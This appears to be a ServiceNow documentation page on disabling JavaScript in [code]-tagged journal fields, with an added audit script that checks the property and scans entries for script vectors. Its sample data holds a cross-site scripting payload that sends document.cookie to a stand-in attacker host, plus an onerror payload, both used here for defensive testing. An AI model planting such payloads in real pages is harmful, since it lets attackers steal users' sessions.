Disable JavaScript tags in embedded HTML [Updated in Security Center 1.3]

  • Release version: Australia
  • Updated: March 12, 2026
  • Reading time: 3 minutes
  • Use the glide.ui.security.codetag.allow_script property to disable support for JavaScript embedded in HTML that is created with the [code] tag.

    The ServiceNow AI Platform mitigates many injection and cross-site attacks by escaping and encoding user input. As a result, users can't write and submit HTML-formatted input for journal fields. However, journal fields can render text enclosed in [code] tags as HTML. Ensure that the glide.ui.security.codetag.allow_script property exists in the sys_properties table and is set to false.
    • There is an associated security risk. If the property is set to true, a malicious user can place harmful JavaScript inside a [code] tag, and that script may execute in another user's browser when the journal field is rendered there.
    • Set the property to false so that journal fields do not render JavaScript code embedded through the [code] tag.
    Warning:
    This is a safe harbor property: once the value has been changed it can't be altered again. The change is non-revertible.
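The check described above (the property row must exist in sys_properties and hold the value false) and an audit of journal text for script hidden inside [code] tags, written as an added example in ServiceNow-style server JavaScript. This is not ServiceNow's own code: the property check takes any name-to-value lookup function, the GlideRecord-based lookup is shown only in a comment, and the sys_properties row and journal entries below are constructed sample data so the file runs under Node without an instance.

```javascript
// Added example (not ServiceNow's own code): two audit helpers for the
// glide.ui.security.codetag.allow_script control.
//   checkAllowScriptProperty(lookup)  - the property row must exist in
//                                       sys_properties with the value "false"
//   findScriptInCodeTags(text)        - flags journal text that carries
//                                       <script>, on*= handlers or javascript:
//                                       URLs inside [code] ... [/code]
// `lookup` is any function name -> value string, or null when no row exists.
// In a ServiceNow background script it could be built on GlideRecord, e.g.
//   function glideLookup(name) {
//     var gr = new GlideRecord('sys_properties');
//     gr.addQuery('name', name);
//     gr.query();
//     return gr.next() ? gr.getValue('value') : null;
//   }
// Here a constructed in-memory table stands in so the file runs under Node.

var PROPERTY_NAME = 'glide.ui.security.codetag.allow_script';

function checkAllowScriptProperty(lookup) {
  var value = lookup(PROPERTY_NAME);
  if (value === null || value === undefined) {
    // "Ensure the property exists": an absent row is a finding, not a pass.
    return { ok: false, reason: PROPERTY_NAME + ' is missing from sys_properties; add it with value false' };
  }
  if (String(value).trim().toLowerCase() !== 'false') {
    return { ok: false, reason: PROPERTY_NAME + ' is "' + value + '", expected false' };
  }
  return { ok: true, reason: PROPERTY_NAME + ' is present and set to false' };
}

// Only text between [code] and [/code] is rendered as HTML, so that is the
// only text worth scanning. The second pattern is a heuristic for script
// execution vectors: <script> tags, inline on* event handler attributes and
// javascript: URLs.
var CODE_BLOCK_RE = /\[code\]([\s\S]*?)\[\/code\]/gi;
var SCRIPT_VECTOR_RE = /<\s*script\b|\son[a-z]+\s*=|javascript\s*:/i;

function findScriptInCodeTags(text) {
  var findings = [];
  var match;
  CODE_BLOCK_RE.lastIndex = 0;
  while ((match = CODE_BLOCK_RE.exec(text)) !== null) {
    var body = match[1];
    if (SCRIPT_VECTOR_RE.test(body)) {
      findings.push({ offset: match.index, snippet: body.slice(0, 80) });
    }
  }
  return findings;
}

// Scan a list of journal entries (for example the `value` column of
// sys_journal_field) and return the indexes that carry a script vector
// inside a [code] tag.
function auditJournalEntries(entries) {
  var hits = [];
  for (var i = 0; i < entries.length; i++) {
    var findings = findScriptInCodeTags(entries[i]);
    if (findings.length > 0) {
      hits.push({ entry: i, findings: findings });
    }
  }
  return hits;
}

// --- Constructed sample data (not taken from any real instance) ---
var SAMPLE_SYS_PROPERTIES = {
  'glide.ui.security.codetag.allow_script': 'true' // deliberately misconfigured
};
function sampleLookup(name) {
  return Object.prototype.hasOwnProperty.call(SAMPLE_SYS_PROPERTIES, name)
    ? SAMPLE_SYS_PROPERTIES[name]
    : null;
}

var SAMPLE_JOURNAL_ENTRIES = [
  'Restarted the service, see attached log.',
  'Workaround: [code]<b>restart</b> the agent[/code]',
  'Please review [code]<script>fetch("https://attacker.example/?c=" + document.cookie)</script>[/code]',
  '[code]<img src=x onerror="alert(document.domain)">[/code]'
];

console.log(JSON.stringify(checkAllowScriptProperty(sampleLookup)));
console.log(JSON.stringify(auditJournalEntries(SAMPLE_JOURNAL_ENTRIES)));
```

The journal scan is a heuristic for triage, not a sanitizer: it tells you which existing entries would have been dangerous while the property was true, so they can be reviewed or cleaned, while the property itself is what stops new ones from executing.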

    More information

    Attribute              Description
    Property name          glide.ui.security.codetag.allow_script
    Configuration type     System Properties (/sys_properties_list.do)
    Category               Validation, sanitization, and encoding
    Purpose                Protects against cross-site scripting and malicious script execution
    Recommended value      false
    Default value          false
    Security risk rating   8.8
    Functional impact      With this remediation, JavaScript in journal fields is escaped in the UI and the encoded text is shown to the user. This can affect functionality, depending on how users of the instance interact with the resulting data.
    Security risk (High)   Input must be validated in the application to defend against cross-site scripting. These attacks let foreign scripts execute in the user's session, in the context of the logged-in browser, and attackers can use them to steal session information and sensitive data.
    References

    Restrict the CODE tag in journal fields

    Render journal field entries as HTML

    High Security Settings

    To learn more about adding or creating a system property, see Add a system property.